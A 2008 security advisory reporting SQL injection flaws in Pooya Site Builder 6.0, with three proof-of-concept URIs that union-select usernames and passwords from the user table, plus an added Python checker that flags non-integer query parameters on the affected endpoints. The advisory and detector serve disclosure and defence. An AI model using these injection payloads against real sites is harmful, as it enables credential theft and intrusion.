

Title: Pooya Site Builder Multiple SQL Injection Vulnerabilities
Published: 2008-06-11-12:00AM
Updated: 2008-06-13-05:52PM
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Credit: AmnPardaz Security Research & Penetration Testing Group
Vulnerable: Pooya Paridel Pooya Site Builder (PSB) 6.0
Not Vulnerable:
Code: An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available:
http://www.example.com/utils/getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr]
http://www.example.com/utils/getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1'
http://www.example.com/utils/getXls.aspx?lnkIdn=-1&part=1 'from 'lnk' 'where' 1='2187 'union' all' 'select' 'CHAR(60)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62)%2bCHAR(60)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2b CHAR(60)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2bUsrNam%2bUsrPwd%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2b CHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62) 'from '[Usr] 'union 'all 'select' data1'
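
A defender-side check for the three endpoints named above, as an added example that is not part of the original advisory or the vendor's code: it flags requests whose xslIdn, lnkIdn or part value is not a plain integer. That these parameters are meant to carry integer identifiers is an assumption, and the sample request lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and parameters named in the advisory's proof-of-concept URIs.
WATCHED = {
    "/utils/getxsl.aspx": {"xslidn"},
    "/utils/getxml.aspx": {"lnkidn", "part"},
    "/utils/getxls.aspx": {"lnkidn", "part"},
}
# Assumption: these parameters are meant to carry plain integer identifiers.
INTEGER = re.compile(r"-?\d{1,10}")


def check_request(uri):
    """Return (parameter, decoded value) pairs that are not plain integers."""
    parts = urlsplit(uri)
    # IIS paths and ASP.NET query-string keys are case-insensitive.
    params = WATCHED.get(parts.path.lower())
    if params is None:
        return []
    findings = []
    # parse_qsl decodes %xx and '+', and yields every repeated key,
    # so a clean first value cannot hide a hostile duplicate.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in params and not INTEGER.fullmatch(value):
            findings.append((name, value))
    return findings


def scan(uris):
    """Map each flagged URI to its offending parameters."""
    return {u: f for u in uris if (f := check_request(u))}


# Constructed sample requests (not real logs); the third mirrors the
# shape of the advisory's first proof-of-concept URI.
SAMPLE = [
    "/utils/getXsl.aspx?xslIdn=42",
    "/utils/getXml.aspx?lnkIdn=-1&part=1",
    "/utils/getXsl.aspx?xslIdn=-1'%20union%20all%20select%20UsrNam%2bUsrPwd%20from%20[Usr]",
    "/UTILS/GETXML.ASPX?LNKIDN=7&part=1&part=1%20from%20lnk",
    "/default.aspx?id=1'",
]

if __name__ == "__main__":
    for uri, hits in scan(SAMPLE).items():
        print(uri, "->", hits)
```

The same allow-list test belongs in the application itself, ahead of any query that uses these values; in log review it only shows that a request was attempted.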

Copyright 2007, SecurityDot
Sun, 07 Sep 2008 08:36:37 +0000
